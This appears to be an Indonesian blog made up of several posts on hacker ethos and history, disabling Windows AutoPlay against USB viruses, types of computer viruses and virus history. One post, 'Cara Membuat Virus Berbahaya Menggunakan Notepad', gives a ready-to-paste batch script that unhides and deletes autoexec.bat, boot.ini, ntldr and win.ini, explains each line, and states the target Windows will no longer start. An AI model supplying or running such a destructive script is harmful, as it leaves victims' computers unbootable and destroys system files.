Persiapan raga merupakan langkah kedua yang perlu dilakukan oleh seorang hacker, dimana raga harus dibangun sedemikian rupa agar bisa mencapai target yang diingikan. Hal yang perlu dipersiapkan adalah:
  • Kesehatan dan kebugaran: hal ini diperlukan agar seorang hacker tetap fit dalam menghadapi setiap tantangan dan perjuangan dalam mempelajari dan mencapai target yang sudah ditetapkan serta kemampuan memory, daya pikir otak, nurani, panca indra bisa dimaksimalkan.
  • Aktif Olahraga: hal ini diperlukan untuk menunjang latihan tubuh agar terhindar dari berbagai ancaman. Misalkan olahraga beladiri untuk melindungi diri ketika ada ancaman, fitness agar tubuh tetap aktif dan sehat  terjaga.
  1. Persiapkan Perbuatan
Persiapan perbuatan adalah langkah ketiga  untuk menjadi seorang hacker, dimana langkah yang perlu dijalani adalah langkah positif dalam kehidupan, senantiasa beramal dan beribadah. Mengurangi, menghindari dan meninggalkan hal-hal negatif adalah perjuangan panjang dan paling berat untuk seorang hacker.
  • Belajar, Berbagi, Senantiasa Update dan Meningkatkan Kemampuan: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family untuk bersama-sama meningkatkan kualitas dan kuantitas kemampuan yang dimiliki.
  • Saling Tolong Menolong, Persahabatan, Hindarkan SARA: hal ini diperlukan agar seorang hacker bisa berkontribusi dalam kehidupan yang global dimana semua sangat universal. Dengan menjadi seorang hacker maka diharuskan memiliki pandangan yang luas sehingga bisa bertindak dengan netral, baik, adil dan bijaksana.
Ada 5 hal penting yang perlu dipelajari oleh seorang Hacker :
  1. Logika (Logic)
Seorang hacker harus senantiasa menggunakan logika dimana hal ini menjadi sebuah pertimbangan akal untuk menghasilkan sesuatu yang baik, benar dan tepat. Manusia diberikan kelebihan oleh YME untuk hal ini, maka manfaatkan secara maksimal.
Logika yang sering digunakan dalam bahasa pemrograman adalah OR, AND, NOT, XOR, NAND, dll. Beberapa program tersusun atas komponen program IF..THEN…ELSE, FOR..TO..DO, WHILE , CASE..OF dan lain-lainnya. Logika ini kemudian akan dikolaborasikan dengan matematika untuk menghasilkan sesuatu yang bernilai Benar (True) atau Salah (False) seperti (<, >, =, +, -, dll).
  1. Perangkat Keras (Hardware)
Seorang hacker harus mengetahui seluk beluk perangkat keras, karena perangkat keras merupakan dasar dari pembentukan teknologi. Perangkat keras disini adalah mengerti seluk beluk pengkabelan, chip, mainboard, switch, hub, elektronika, dll. Apabila seorang hacker sudah memahami perangkat keras, maka akan lebih mudah dalam membuat instruksi untuk perangkat lunaknya. Pernah melihat James Bond & Mission Impossible? Nah, diluarsana banyak orang luarbiasa yang memahami hardware sangat dalam.
Yang perlu dipelajari lebih dalam dari perangkat kerasa adalah komponen pada bagian-bagian berikut:
  • Input Device (Unit Masukan: Keyboard, Mouse): media untuk memasukkan data dari luar ke dalam suatu memori dan processor.
  • Process Device (Unit Pemrosesan: CPU, Microchip,RAM): media untuk mengolah inputan guna menghasilkan informasi yang diperlukan.
  • Output Device (Unit Keluaran: Monitor, Scanner, Speaker): media untuk mengeluarkan hasil informasi.
  • Backing Storage ( Unit Penyimpanan: Harddisk, Disk): media untuk melakukan penyimpanan data dan informasi.
  • Periferal ( Unit Tambahan: USB, Modem): media tambahan yang digunakan untuk mendukung proses kerja perangkat keras.
  1. Perangkat Lunak (Software)
Seorang hacker akan mempelajari software sebagai instruksi kepada hardware untuk melakukan perintah-perintah yang diinginkan. Software ini dibangun dari berbagai bahasa, dimana bahasa yang perlu dipelajari dalam bahasa mesin adalah 0, 1 dan analog. Sebagai dasar adalah bahasa pemrograman adalah assembly. Urutan yang tepat sebagai berikut saya kutip dari wikipedia:
  1. Bahasa Mesin, yaitu memberikan perintah kepada komputer dengan memakai kode bahasa biner, contohnya 01100101100110.
  2. Bahasa Tingkat Rendah (ASM) atau dikenal dengan istilah bahasa rakitan (bah.Inggris Assembly), yaitu memberikan perintah kepada komputer dengan memakai kode-kode singkat (kode mnemonic), contohnya MOV, SUB, CMP, JMP, JGE, JL, LOOP, dsb.
  3. Bahasa Tingkat Menengah (C), yaitu bahasa komputer yang memakai campuran instruksi dalam kata-kata bahasa manusia (lihat contoh Bahasa Tingkat Tinggi di bawah) dan instruksi yang bersifat simbolik, contohnya {, }, ?, <<, >>, &&, ||, dsb.
  4. Bahasa Tingkat Tinggi (HTML, XML, JSP, JAVA, VB, PASCAL, DELPHI, C#, F#, PHP, ASP, SQL, ORACLE, PYTHON, PERL, dll) yaitu bahasa komputer yang memakai instruksi berasal dari unsur kata-kata bahasa manusia, contohnya begin, end, if, for, while, and, or, dsb.
Sebagai seorang hacker, semakin kompleks mengetahui bahasa pemrograman maka akan semakin mudah dalam memolak balikkan software, mencari celah, memperbaiki, memberikan solusi untuk memecahkan masalah dan bahkan membangun sebuah aplikasi baru.
Kuncinya adalah semakin dalam mengetahui bahasa mesin, akan lebih mudah dalam berkomunikasi dengan mesin.
Selain mengenal bahasa pemrograman, yang perlu dipelajari adalah sistem yang dibangun dari software yang sudah ada saat ini, sebagai salah satu contoh yaitu Sistem Operasi: *Nix, Linux, FreeBSD, SunOS, Windows, dll.
  1. Jaringan (Networking)
Seorang hacker perlu mengetahui dan mendalami jaringan elektronik dan komputer yang merupakan bagian penting untuk dipelajari, karena jaringan inilah yang menghubungkan antara satu dengan yang lainnya seperti sebuah jaring laba-laba yang tidak terputus.
Ketika kita sudah memahami jaringan maka akan cukup mudah dalam melakukan setting, konfigurasi dan dapat memegang kendali terhadap jaringan. Didalam jaringan inilah alur komunikasi bergerak antara satu perangkat ke perangkat yang lainnya. Pada jaringan inilah banyak protokol komunikasi yang digunakan sehingga perlu juga untuk dipelajari seperti TCP, HTTP/S, FTP/S, dll. Apabila jaringan berada didalam kendali, maka seluruh informasi yang mengalir didalamnya akan sangat mudah untuk didapat, ditambah, diubah, bahkan untuk dihapus sekalipun.
  1. Kriptografi (Cryptography)
Seorang hacker memiliki tantangan dalam hal kriptografi, karena saat ini hampir seluruh transaksi komunikasi sudah menggunakan cryptography sebagai jembatan pelindung. Dengan modal logika yang matang maka cryptography dapat lebih mudah untuk dipelajari walaupun dalam struktur yang sulit. Seorang hacker memerlukan pengetahuan kriptografi untuk menjaga aspek keamanan informasi seperti kerahasiaan informasi, keabsahan informasi, integritas informasi, serta autentikasi informasi dan bahkan untuk mendapatkan dan menerjemahkan informasi itu sendiri.
Ada banyak model kriptografi yang saat ini sudah banyak berkembang yaitu MD5, SHA, DES, AES, Base64, IDEA, BLOWFISH, RSA, Dll. Kriptografi ini banyak digunakan untuk konfigurasi, penyimpanan data dalam database, dan komunikasi transaksi pada jaringan.


Jumat, 14 Oktober 2016

Sejarah Hacker

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.


Sejarah Hacker
Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker berubah menjadi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus dsb. Padahal, mereka adalah cracker. Crackerlah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para hacker dipahami dibagi menjadi 2 golongan White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

Kamis, 13 Oktober 2016

Carar Melindungi Komputer Dari Virus Flashdisk






Banyak virus yang bertebaran melalui flasdisk, kali ini saya akan memberikan cara melindungi komputer dari virus-virus yang berasal dari flashdisk dengan menonaktifkan fungsi autoplay policy setting.Cara ini berlaku untuk OS windows 7 atau Vista.

Setiap kali kita menghubungkan komputer dengan Removable-media seperti memory,flasdisk, atau CD/DVD, maka jendela autorun windows akan terbuka di layar komputer secara otomatis.Sebenarnya fungsi tersebut bertujuan untuk memudahkan user, karena menyediakan beberapa menu seperti membuka folder, memainkan video/music (jika berupa terdapat file multimedia, dsb.

 Akan tetapi, fungsi tersebut bisa jadi berbahaya bagi keamanan komputer. Selain internet, media eksternal merupakan sarana penyebaran virus terbesar. Ketika sebuah media penyimpanan eksternal yang mengandung virus terhubung pada komputer dan Anda langsung membukanya menggunakan menu ‘Open files to view files’ yang ada pada autorun Windows, maka virus langsung masuk ke sistem komputer Anda. Terlebih virus-virus yang bisa aktif secara otomatis seperti Autorun.inf dan lain-lain.

Tutorial :

  1. Tekan tombol windows+R dan ketik gpedit.msc tekan enter.
  2. Klik Computer Configuration –> Administrative Templates –> Windows Components. Di bawahnya Anda akan menemukan AutoPlay Policies.
  3. Pada bagian kanan AutoPlay Policies, klik kanan pada Turn off AutoPlay, dan pilih Edit. Kemudian pada jendela baru yang muncul, pilih Enabled.
  4. Klik tombol apply dan OK
Sekarang fitur autorun windows tidak akan muncul setiap kali  menghubungkan Removable-media dengan komputer.

Cara Membuat Virus Berbahaya Menggunakan Notepad






Dari posting-posting sebelumnya kita sudah membahas Sejarah virus, Jenis virus, dan Cara membuat virus untuk menjaili teman pake notepad. Nah sekarang saya saatnya memberikan cara untuk membuat virus berbahaya bagi komputer menggunakan notepad.

Pertama, Copy Script di bawah ini dan Paste pada notepad anda :
-------------------------------------------------------------------------------------attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

-----------------------------------------------------------------------------------------Lalu, Simpan/Save AS dengan Format .bat Misalnya, Berbahaya.bat

Keterangan Kode :
1. del c:\autoexec.bat  <-->  buat hapus autoexe.bat di direktori C
2. del c:\boot.ini  <-->  buat hapus Boot.ini di direktori C
3. del c:\ntldr  <-->  buat hapus ntldr
4. del c:\windows\win.ini  <-->  untuk hapus file win.ini yang berlokasi di C:/windows
5. attrib -r -s -h  <-->  untuk menampilkan file ke 4 windows tadi yang di supper hidden


Note : Jangan dianggap main! Bila system ini dijalankan di windows anda tidak akan hidup dan juga tidak ada penawarnya jadi gunakanlah dengan manfaat.

Jenis Jenis Virus Komputer



Virus komputer adalah sebuah program perangkat lunak berbahaya yang ditulis dengan sengaja untuk memasuki komputer tanpa izin atau tanpa spengetahuan pengguna. Virus komputer punya kemampuan untuk mengandakan dirinya sendiri, akibatnya dapat terus menyebar. Beberapa virus melakukan sedikit kerusakan, sementara yang lain dapat menyebabkan kerusakan parah atau mempengaruhi kinerja program dan sistem.

Ada berbagai jenis virus yang dapat diklasifikasikan menurut asal mereka, teknik, jenis file yang mereka infeksi, di mana mereka bersembunyi, jenis kerusakan, jenis sistem operasi. Berikut ini berbagai jenis virus komputer beserta penjelasannya .

1. Memory Resident Virus

Virus ini menetapkan dalam memori komputer dan otomatis aktif setiap kali OS berjalan dan menginfeksi semua file yang dibuka.

- Persembunyian: Jenis virus ini bersembunyi dalam RAM dan tinggal di sana bahkan setelah kode berbahaya dijalankan. Virus mendapat kontrol atas memori sistem dan mengalokasikan blok memori di mana ia menjalankan kode sendiri, dan mengeksekusi kode ketika fungsi apapun dijalankan.

- Target: Dapat merusak file dan program yang dibuka, ditutup, disalin, diubah namanya, dll.

- Contoh: Randex, CMJ, Meve, dan MrKlunky.

- Proteksi: Instal program antivirus

2. Direct Action Viruses

Tujuan utama virus ini adalah untuk meniru dan bertindak ketika dijalankan. Ketika kondisi tertentu terpenuhi, virus akan beraksi dan menginfeksi file dalam direktori atau folder yang ditentukan dalam path file AUTOEXEC.BAT. File batch ini selalu terletak di direktori root hard disk dan melakukan operasi tertentu ketika komputer boot.

Teknik FindFirst / FindNext digunakan di mana kode memilih beberapa file sebagai korbannya. Hal ini juga menginfeksi perangkat eksternal seperti pen drive atau hard disk.

- Persembunyian: Virus terus berpindahlokasi  ke file baru setiap kali kode dijalankan, tapi umumnya ditemukan di direktori root pada hard disk.

- Target: Virus ini dapat merusak file. Pada dasarnya, ini adalah file virus-infector.

- Contoh: Vienna virus

- Proteksi: Instal scanner antivirus.


3. Overwrite Viruses

Virus jenis ini menghapus informasi dalam file yang terinfeksi.

- Persembunyian: Virus menggantikan isi file. Namun, tidak mengubah ukuran file.

- Contoh: Way, Trj.Reboot, Trivial.88.D

- Proteksi: Satu-satunya cara untuk membersihkan file yang terinfeksi oleh virus Overwrite adalah dengan menghapus file yang terinfeksi.

4. Boot Sector Virus

Jenis virus ini mempengaruhi sektor boot dari sebuah hard disk. Ini adalah bagian penting dari disk, di mana informasi dari disk itu sendiri disimpan bersama dengan sebuah program yang memungkinkan untuk boot (mulai) . Virus jenis ini juga disebut Master Boot Sector Virus or Master Boot Record Virus.

- Persembunyian: Virus ini bersembunyi di dalam memori hingga DOS mengakses floppy disk, Dan ke manapun data yang boot akses, virus menginfeksi itu.

- Contoh: Polyboot.B, AntiEXE

- Proteksi: Cara terbaik untuk menghindari virus boot sector adalah untuk memastikan floppy disk di write protect.


5. Macro Virus

Macro virus menginfeksi file yang dibuat menggunakan aplikasi atau program tertentu yang berisi macro, seperti doc, Xls, Pps, Mdb, dll. Virus ini otomatis menginfeksi file yang berisi macro, dan juga menginfeksi template dan dokumen. Hal ini disebut juga sebagai jenis virus e-mail.

- Persembunyian: Bersembunyi dalam dokumen yang dibagi melalui e-mail atau jaringan.

- Contoh:Relax, Melissa.A, Bablas, O97M/Y2K

- Proteksi: Teknik perlindungan terbaik adalah  menghindari membuka e-mail dari pengirim yang tidak dikenal. Juga, menonaktifkan macro dapat membantu melindungi data.

6. Directory Virus
Direktori virus (juga disebut Cluster Virus / File System Virus) menginfeksi direktori komputer  dengan mengubah jalan yang menunjukkan lokasi file. Ketika menjalankan program file dengan ekstensi EXE. Atau COM. Yang telah terinfeksi oleh virus, Anda tidak sadar menjalankan program virus, sedangkan file asli dan program sebelumnya dipindahkan oleh virus. Setelah terinfeksi, menjadi mustahil untuk menemukan file asli.

- Persembunyian: Virus ini biasanya terletak dalam satu lokasi disk, tetapi menginfeksi seluruh program dalam direktori.

- Contoh: virus Dir-2

- Proteksi: instal ulang semua file yang terinfeksi setelah memformat disk.

7. Polymorphic Virus

Virus polimorfik mengenkripsi atau menyandikan diri dengan cara yang berbeda (menggunakan algoritma yang berbeda dan kunci enkripsi) setiap kali mereka menginfeksi sistem.

- Contoh: Elkern, Marburg, Setan Bug, dan Tuareg

- Proteksi: Instal antivirus high-end.

8. Companion Viruses

- Persembunyian: umumnya menggunakan nama file yang sama dan membuat ekstensi yang berbeda. Sebagai contoh: Jika ada file "Me.exe", virus membuat file lain bernama "Me.com" dan bersembunyi di file baru. Ketika sistem memanggil nama file "Me", yang ". Com" file dijalankan (sebagai ". Com" memiliki prioritas lebih tinggi daripada "exe."), Sehingga menginfeksi sistem.

- Contoh: Stator, Asimov.1539 dan Terrax.1069

- Proteksi: Instal scanner antivirus dan juga men-download Firewall.

9. FAT Virus

File allocation table (FAT) adalah bagian dari disk yang digunakan untuk menyimpan semua informasi mengenai lokasi file, ruang yang tersedia, ruang tidak dapat digunakan, dll

- Persembunyian: virus FAT menyerang bagian FAT dan dapat merusak informasi penting. Hal ini bisa sangat berbahaya karena mencegah akses ke bagian tertentu dari disk dimana file penting disimpan. Kerusakan yang disebabkan dapat mengakibatkan hilangnya informasi dari file individual atau bahkan seluruh direktori.

- Contoh: link Virus

- Proteksi: Sebelum serangan virus menyebar ke semua file di komputer, car semua file yang benar-benar diperlukan pada hard drive, dan hapus yang yang tidak diperlukan. Mereka mungkin file yang dibuat oleh virus.

10. Multipartite Virus

Virus ini menyebar dalam berbagai cara tergantung pada sistem operasi yang terpasang dan adanya file tertentu.

- Persembunyian: Pada tahap awal, virus ini cenderung bersembunyi di dalam memori kemudian menginfeksi hard disk.

- Contoh: Invader, Flip dan Tequila

- Proteksi: Bersihkan sektor boot dan juga disk untuk menyingkirkan virus, dan kemudian kembalikan semua data di dalamnya. Namun, pastikan bahwa data  bersih.

11. Web Scripting Virus

Banyak halaman web mengunakan kode yang kompleks dalam rangka menciptakan konten yang menarik dan interaktif. Kode ini sering dimanfaatkan untuk  tindakan yang tidak diinginkan.

- Persembunyian: Sumber utama scripting virus web browser atau halaman web yang terinfeksi.

- Contoh: JS.Fortnight adalah virus berbahaya yang menyebar melalui e-mail.

- Proteksi: Instal aplikasi microsoft tool yang merupakan fitur standar pada Windows 2000, Windows 7 dan Vista. Scan komputer dengan aplikasi ini.

12. Worms

Worm adalah program yang sangat mirip dengan virus, memiliki kemampuan untuk mereplikasi diri dan dapat menyebabkan efek negatif pada sistem . Tapi mereka dapat dideteksi dan dihilangkan dengan perangkat lunak antivirus.

- Persembunyian: umumnya ini menyebar melalui e-mail dan jaringan. Mereka tidak menginfeksi file atau merusak mereka, tetapi mereka meniru begitu cepat sehingga seluruh jaringan akan runtuh.

- Contoh: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson

- Proteksi: Instal antivirus versi terbaru.

13. Trojans

Trojan atau Trojan horse adalah kode berbahaya , yang tidak seperti virus, tidak mereproduksi dengan menginfeksi file lainnya, juga tidak mereplikasi diri seperti cacing. Program ini menyamar dirinya sebagai program atau aplikasi yang berguna.

Selain itu, ada banyak virus komputer lain yang memiliki potensi untuk menginfeksi data. Oleh karena itu, lindungi komputer kamu dengan menginstal perangkat lunak antivirus yang berkualitas tinggi dan asli. Selain itu jangan mendownload file sembarangan di situs download gratis.

Sejarah dan Perkembangan Virus Komputer

Munculnya komputer pertama kali juga merupakan lahirnya perkembangan virus komputer. Salah satu pembuat komputer dan menciptakan EDVAC ( Electronic Discrete Variable Automatic Computer) yang bernama John von Newman sekitar tahun 1949, memaparkan dalam makalahnya yang membahas kemungkinan suatu program yang dapat menyebar secara otomatis.

Awal Sejarah dan Perkembangan Virus Komputer

Dalam sejarah dan perkembangan virus komputer, pada tahun 1960 di AT&T Bell Laboratory yang merupakan laboratorium komputer raksasa di dunia, pada saat rehat para ilmuwan komputer yang bekerja di laboratorium tersebut membuat sebuah permainan yang disebut dengan Perang Program atau Core War. Core War itu sendiri adalah membuat suatu program yang dibuat guna menyerang, memperbaiki dan memusnahkan.
Pemenang dalam permainan program ini yaitu pemilik program yang memiliki sisa program terbanyak dalam waktu yang telah ditentukan. Sebenarnya virus termasuk sebuah program/software, namun virus diciptakan untuk hal-hal yang berdampak merugikan.


Seorang ilmuwan komputer Amerika dan dikenal sebagai penemu teknik pertahanan virus komputer yang bernama Frederick B. Cohen sekitar tahun 1983, pada saat itu masih menjadi mahasiswa di University of Southern California School of Engineering (saat ini Viterbi School of Engineering), menulis sebuah program yang dapat menguasai sebuah sistem operasi komputer. Program tersebut merupakan salah satu virus komputer pertama.
Dengan berkembangnya ilmu pengetahuan di bidang komputer, sekitar tahun 1989, ditemukanlah virus komputer yang dikenal dengan virus polimorf. Virus tersebut dikenal dengan V2Px yang dengan sendirinya dapat mengubah diri menjadi varian baru. Sekitar tahun 1990, virus DIR II memiliki kemampuan baru dalam menginfeksi program dengan cara menyerang data-data FAT.